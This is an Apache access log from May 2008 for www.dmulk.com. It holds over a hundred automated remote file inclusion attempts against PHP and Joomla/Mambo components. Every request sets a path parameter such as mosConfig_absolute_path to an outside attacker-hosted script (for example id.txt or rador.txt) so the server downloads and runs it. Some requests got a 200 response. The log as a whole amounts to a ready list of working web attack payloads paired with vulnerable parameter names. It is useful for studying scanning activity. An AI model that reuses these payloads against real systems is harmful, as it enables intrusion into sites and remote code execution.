212.113.24.154 - - [02/May/2008:09:00:02 -0700] "GET /logs//include.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:00:02 -0700] "GET //include.php?path[docroot]=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.242.108.55 - - [02/May/2008:09:00:02 -0700] "GET /logs/access_080207.log//components/com_simpleboard/file_upload.php?sbp=http://perpetuallyconfused.com/games/admin/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.242.108.55 - - [02/May/2008:09:00:03 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://perpetuallyconfused.com/games/admin/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.242.108.55 - - [02/May/2008:09:00:03 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://perpetuallyconfused.com/games/admin/images/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:00:17 -0700] "GET //browse.php/header.php?prefix=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:00:19 -0700] "GET /logs//browse.php/header.php?prefix=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.38.19.130 - - [02/May/2008:09:00:23 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [02/May/2008:09:00:24 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.19.130 - - [02/May/2008:09:00:30 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://geocities.com/voice_mr/scbot.lama.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.36.243.4 - - [02/May/2008:09:00:57 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.243.4 - - [02/May/2008:09:00:58 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.211 - - [02/May/2008:09:01:05 -0700] "GET /logs/access.log//browse.php/header.php?prefix=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.211 - - [02/May/2008:09:01:06 -0700] "GET //browse.php/header.php?prefix=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.211 - - [02/May/2008:09:01:06 -0700] "GET /logs//browse.php/header.php?prefix=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [02/May/2008:09:01:11 -0700] "GET /logs//cutenews/inc/shows.inc.php?cutepath=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.68.157 - - [02/May/2008:09:01:11 -0700] "GET //cutenews/inc/shows.inc.php?cutepath=http://sulawesi.us/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.241.231 - - [02/May/2008:09:01:12 -0700] "GET /logs//errors.php?error=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.10.241.231 - - [02/May/2008:09:01:12 -0700] "GET //errors.php?error=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.32.31.33 - - [02/May/2008:09:01:33 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://dime130.dizinc.com/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.32.31.33 - - [02/May/2008:09:01:33 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://dime130.dizinc.com/~josecond/ajax/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:01:45 -0700] "GET /logs//ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:01:45 -0700] "GET //ashnews.php?pathtoashnews=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:01:51 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:01:53 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:01:54 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:01:56 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:01:58 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:01:58 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:01:59 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:02:01 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:02:01 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:09:02:02 -0700] "GET /logs//errors.php?error=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:09:02:03 -0700] "GET //errors.php?error=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:02:04 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:02:04 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.126 - - [02/May/2008:09:02:05 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://frenchcoast.org/tikiwiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.126 - - [02/May/2008:09:02:05 -0700] "GET /logs/index.php?sourcedir=http://frenchcoast.org/tikiwiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:02:11 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:02:14 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:02:14 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:02:15 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:02:15 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:02:18 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
216.18.5.126 - - [02/May/2008:09:02:19 -0700] "GET /logs/access_080304.log/index.php?sourcedir=http://frenchcoast.org/tikiwiki/img/wiki/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:02:19 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:02:22 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:02:26 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:02:26 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:02:29 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [02/May/2008:09:02:29 -0700] "GET /logs/access_080228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:02:37 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [02/May/2008:09:02:42 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.61.4 - - [02/May/2008:09:02:46 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:02:56 -0700] "GET //includes/kb_constants.php?module_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:02:56 -0700] "GET //includes/kb_constants.php?module_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:02:57 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:02:57 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:03:00 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:03:00 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.vspbilgisayar.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:03:04 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:09:03:06 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:09:03:06 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:09:03:07 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:03:31 -0700] "GET /logs/access_080306.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:03:36 -0700] "GET /logs//common/db.php?commonpath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:03:37 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:03:37 -0700] "GET //common/db.php?commonpath=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.18.5.126 - - [02/May/2008:09:03:38 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.18.5.126 - - [02/May/2008:09:03:38 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://edgcs.com/store/administrator/components/com_jcs/views/test.cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:03:38 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.810" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:03:47 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:03:52 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:03:52 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.202.29.8 - - [02/May/2008:09:03:55 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.209.2 - - [02/May/2008:09:03:56 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.106.244.146 - - [02/May/2008:09:03:57 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:03:57 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
148.202.29.8 - - [02/May/2008:09:03:58 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.mrhard.com/templates/sbherkules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.218.248.94 - - [02/May/2008:09:04:00 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]http://www.easy-mart.co.kr/becommunity/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:04:01 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:04:03 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
67.19.61.90 - - [02/May/2008:09:04:04 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://poultrybreedersguide.com/auction/themes/default/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [02/May/2008:09:04:04 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://poultrybreedersguide.com/auction/themes/default/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.218.248.94 - - [02/May/2008:09:04:05 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]http://www.mariosoucy.com/voicefiles/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.218.248.94 - - [02/May/2008:09:04:06 -0700] "GET /logs/access_080117.log//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:04:11 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
66.7.193.54 - - [02/May/2008:09:04:15 -0700] "GET /logs/access.log//index2.php?option=com_virtuemart&task=§ionid=&id=&mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.193.54 - - [02/May/2008:09:04:15 -0700] "GET //index2.php?option=com_virtuemart&task=§ionid=&id=&mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.193.54 - - [02/May/2008:09:04:15 -0700] "GET /logs//index2.php?option=com_virtuemart&task=§ionid=&id=&mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:04:30 -0700] "GET /logs//errors.php?error=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:04:30 -0700] "GET //errors.php?error=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:04:35 -0700] "GET /logs//errors.php?error=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:04:36 -0700] "GET //errors.php?error=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.193.54 - - [02/May/2008:09:04:38 -0700] "GET /logs/access_080215.log//index2.php?option=com_virtuemart&task=§ionid=&id=&mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:04:48 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:04:48 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
88.80.202.91 - - [02/May/2008:09:05:03 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [02/May/2008:09:05:11 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.80.202.91 - - [02/May/2008:09:05:11 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [02/May/2008:09:05:40 -0700] "GET /logs/send_reminders.php?includedir=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [02/May/2008:09:05:41 -0700] "GET /send_reminders.php?includedir=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
140.120.27.17 - - [02/May/2008:09:05:44 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:05:45 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:05:45 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:05:45 -0700] "GET //ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:05:46 -0700] "GET /logs//ashnews.php?pathtoashnews=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:05:49 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
89.42.133.2 - - [02/May/2008:09:05:50 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://areairc.t35.com/new/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.243.4 - - [02/May/2008:09:05:58 -0700] "GET /logs/send_reminders.php?includedir=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.36.243.4 - - [02/May/2008:09:05:58 -0700] "GET /send_reminders.php?includedir=http://www.toneeleww.nl//modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:05 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:06:05 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:06:05 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.175.248.213 - - [02/May/2008:09:06:06 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.107.233 - - [02/May/2008:09:06:09 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
